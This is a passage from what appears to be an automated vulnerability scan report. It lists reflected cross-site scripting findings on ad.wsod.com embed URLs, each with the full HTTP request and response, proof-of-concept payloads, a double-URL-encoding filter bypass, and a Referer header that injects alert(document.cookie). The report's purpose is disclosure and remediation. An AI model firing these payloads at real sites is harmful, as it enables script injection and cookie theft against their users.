d7fd7c0fb6e6a631357/1411.0.js.120x60/1296399017**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=111050813788ae9"-alert(1)-"90a9ad5ee9c&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a">
...[SNIP]...

5.63. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d219"-alert(1)-"d40e45bc60b was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a3d219"-alert(1)-"d40e45bc60b HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
*;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a3d219"-alert(1)-"d40e45bc60b">
...[SNIP]...

5.64. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dab6"-alert(1)-"f599f1b3586 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD5dab6"-alert(1)-"f599f1b3586&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
e6a631357/1411.0.js.120x60/1296399026**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD5dab6"-alert(1)-"f599f1b3586&ASID=de8164d050b942d8a816e5fd11a9275a">
...[SNIP]...

5.65. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba586%2522%253balert%25281%2529%252f%252fa487625405a was submitted in the REST URL parameter 2. This input was echoed as ba586";alert(1)//a487625405a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357ba586%2522%253balert%25281%2529%252f%252fa487625405a/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:51:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357ba586";alert(1)//a487625405a/1411.0.js.120x60/1296399087**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8
...[SNIP]...

5.66. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4698d%2522%253balert%25281%2529%252f%252fa11953fd95 was submitted in the REST URL parameter 3. This input was echoed as 4698d";alert(1)//a11953fd95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x604698d%2522%253balert%25281%2529%252f%252fa11953fd95/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:51:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x604698d";alert(1)//a11953fd95/1296399093**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816
...[SNIP]...

5.67. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdb7c"-alert(1)-"bd1f4188982 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208fdb7c"-alert(1)-"bd1f4188982&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296399002**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208fdb7c"-alert(1)-"bd1f4188982&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a">
...[SNIP]...

5.68. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59d14"-alert(1)-"17d20a062e9 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G59d14"-alert(1)-"17d20a062e9&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296398983**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G59d14"-alert(1)-"17d20a062e9&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a">
...[SNIP]...

5.69. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77ac7"-alert(1)-"d6a67b2bc13 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!77ac7"-alert(1)-"d6a67b2bc13&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
c="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296398946**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!77ac7"-alert(1)-"d6a67b2bc13&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a">
...[SNIP]...

5.70. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2ee5"-alert(1)-"465aa420697 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a&c2ee5"-alert(1)-"465aa420697=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:51:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1684

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a&c2ee5"-alert(1)-"465aa420697=1">
...[SNIP]...

5.71. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3ba0'-alert(1)-'847a44efb7d was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8015235d3ba0'-alert(1)-'847a44efb7d&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:49:20 GMT; path=/
Set-Cookie: i_1=33:1411:972:100:0:38345:1296398960:L|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 14:49:20 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 931

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235d3ba0'-alert(1)-'847a44efb7d&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       fu
...[SNIP]...

5.72. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [10,1,103;1920;1200;http%3A_@2F_@2Fredacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**

Issue detail

The value of the 10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9d3d'-alert(1)-'889a7271f4a was submitted in the 10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!e9d3d'-alert(1)-'889a7271f4a&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
